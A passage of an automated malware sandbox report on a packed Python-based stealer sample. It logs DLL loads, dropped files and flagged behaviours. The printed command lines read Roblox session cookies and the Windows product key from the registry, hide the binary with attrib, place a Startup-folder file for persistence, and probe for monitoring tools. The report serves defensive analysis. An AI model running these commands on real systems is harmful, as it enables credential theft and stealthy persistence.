              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\tree.comSection loaded: ulib.dll
              Source: C:\Windows\SysWOW64\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
              Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\tree.comSection loaded: ulib.dll
              Source: C:\Windows\SysWOW64\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\SysWOW64\getmac.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\getmac.exeSection loaded: wkscli.dll
              Source: C:\Windows\SysWOW64\getmac.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\getmac.exeSection loaded: mpr.dll
              Source: C:\Windows\SysWOW64\getmac.exeSection loaded: framedynos.dll
              Source: C:\Windows\SysWOW64\getmac.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\getmac.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\getmac.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\getmac.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\getmac.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\getmac.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\getmac.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\getmac.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
              Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\tree.comSection loaded: ulib.dll
              Source: C:\Windows\SysWOW64\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: KpHYfxnJs6.exeStatic file information: File size 9081534 > 1048576
              Source: KpHYfxnJs6.exeStatic PE information: Raw size of .boot is bigger than: 0x100000 < 0x2bac00
              Source: Binary string: D:\a\_work\1\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2905394504.000000006F911000.00000020.00000001.01000000.00000007.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\python311.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2898642505.000000006C626000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.pdb source: powershell.exe, 00000046.00000002.2707327914.0000000004ACA000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: KpHYfxnJs6.exe, 00000004.00000002.2897142653.000000006C0A3000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\_lzma.pdbOO source: KpHYfxnJs6.exe, 00000004.00000002.2903601786.000000006F8DB000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\_bz2.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2903162092.000000006F8A1000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2896773038.000000006BEE2000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\_w\1\b\libssl-1_1.pdbAA source: KpHYfxnJs6.exe, 00000004.00000002.2896773038.000000006BEE2000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\select.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2901778919.000000006F851000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\_ssl.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2901169725.000000006F821000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\_ctypes.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2904571313.000000006F8F1000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\_hashlib.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2900426461.000000006F811000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\_lzma.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2903601786.000000006F8DB000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\_queue.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2900045891.000000006F801000.00000040.00000001.01000000.00000014.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\unicodedata.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2895977031.000000006BE70000.00000040.00000001.01000000.00000015.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 1.1.1q 5 Jul 2022built on: Thu Aug 18 20:09:02 2022 UTCplatform: VC-WIN32OPENSSLDIR: "C:\Program Files (x86)\Common Files\SSL"ENGINESDIR: "C:\Program Files (x86)\OpenSSL\lib\engines-1_1"not available source: KpHYfxnJs6.exe, 00000004.00000002.2897142653.000000006C0A3000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\_socket.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2902247843.000000006F861000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\sqlite3.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2898061015.000000006C181000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 0000006D.00000000.2746843353.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp, rar.exe, 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\_sqlite3.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2902609939.000000006F881000.00000040.00000001.01000000.0000000C.sdmp

              Data Obfuscation

              barindex
              Suspicious powershell command line found
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.cmdline"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.cmdline"
              Source: initial sampleStatic PE information: section where entry point is pointing to: .boot
              Source: KpHYfxnJs6.exeStatic PE information: section name:
              Source: KpHYfxnJs6.exeStatic PE information: section name:
              Source: KpHYfxnJs6.exeStatic PE information: section name:
              Source: KpHYfxnJs6.exeStatic PE information: section name:
              Source: KpHYfxnJs6.exeStatic PE information: section name:
              Source: KpHYfxnJs6.exeStatic PE information: section name: .themida
              Source: KpHYfxnJs6.exeStatic PE information: section name: .boot
              Source: libffi-8.dll.0.drStatic PE information: section name: UPX2
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeCode function: 4_3_075ACD27 push eax; retf 4_3_075ACD2D
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeCode function: 4_3_075ACD27 push eax; retf 4_3_075ACD2D
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeCode function: 4_3_075ACD27 push eax; retf 4_3_075ACD2D
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeCode function: 4_3_075ACD27 push eax; retf 4_3_075ACD2D
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeCode function: 4_3_075ACD27 push eax; retf 4_3_075ACD2D
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeCode function: 4_3_075ACD27 push eax; retf 4_3_075ACD2D
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeCode function: 4_3_075ACD27 push eax; retf 4_3_075ACD2D
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeCode function: 4_3_075ACD27 push eax; retf 4_3_075ACD2D
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeCode function: 4_3_075ACD27 push eax; retf 4_3_075ACD2D
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeCode function: 4_3_075ACD27 push eax; retf 4_3_075ACD2D
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeCode function: 4_3_075AF599 pushfd ; ret 4_3_075AF59C
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeCode function: 4_3_075AF599 pushfd ; ret 4_3_075AF59C
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeCode function: 4_3_075AF599 pushfd ; ret 4_3_075AF59C
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeCode function: 4_3_075AF599 pushfd ; ret 4_3_075AF59C
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeCode function: 4_3_075AF599 pushfd ; ret 4_3_075AF59C
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeCode function: 4_3_075AF599 pushfd ; ret 4_3_075AF59C
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeCode function: 4_3_075AF599 pushfd ; ret 4_3_075AF59C
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeCode function: 4_3_075AF599 pushfd ; ret 4_3_075AF59C
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeCode function: 4_3_075AF599 pushfd ; ret 4_3_075AF59C
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeCode function: 4_3_075AF599 pushfd ; ret 4_3_075AF59C
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeCode function: 4_3_075ACD27 push eax; retf 4_3_075ACD2D
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeCode function: 4_3_075ACD27 push eax; retf 4_3_075ACD2D
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeCode function: 4_3_075ACD27 push eax; retf 4_3_075ACD2D
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeCode function: 4_3_075ACD27 push eax; retf 4_3_075ACD2D
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeCode function: 4_3_075ACD27 push eax; retf 4_3_075ACD2D
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeCode function: 4_3_075ACD27 push eax; retf 4_3_075ACD2D
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeCode function: 4_3_075ACD27 push eax; retf 4_3_075ACD2D
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeCode function: 4_3_075ACD27 push eax; retf 4_3_075ACD2D
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeCode function: 4_3_075ACD27 push eax; retf 4_3_075ACD2D
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeCode function: 4_3_075ACD27 push eax; retf 4_3_075ACD2D
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeCode function: 4_3_075AF599 pushfd ; ret 4_3_075AF59C
              Source: KpHYfxnJs6.exeStatic PE information: section name: entropy: 7.970952206496813
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1

              Persistence and Installation Behavior

              barindex
              Uses attrib.exe to hide files
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h +s "C:\Users\user\Desktop\KpHYfxnJs6.exe"
              Uses cmd line tools excessively to alter registry or file data
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: attrib.exe
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73202\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73202\_socket.pydJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.dllJump to dropped file
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73202\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73202\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73202\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73202\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73202\libssl-1_1.dllJump to dropped file
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73202\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73202\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73202\python311.dllJump to dropped file
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeJump to dropped file
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73202\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73202\libffi-8.dllJump to dropped file
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73202\VCRUNTIME140.dllJump to dropped file
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73202\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73202\sqlite3.dllJump to dropped file
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73202\libcrypto-1_1.dllJump to dropped file
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73202\unicodedata.pydJump to dropped file

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scrJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scrJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
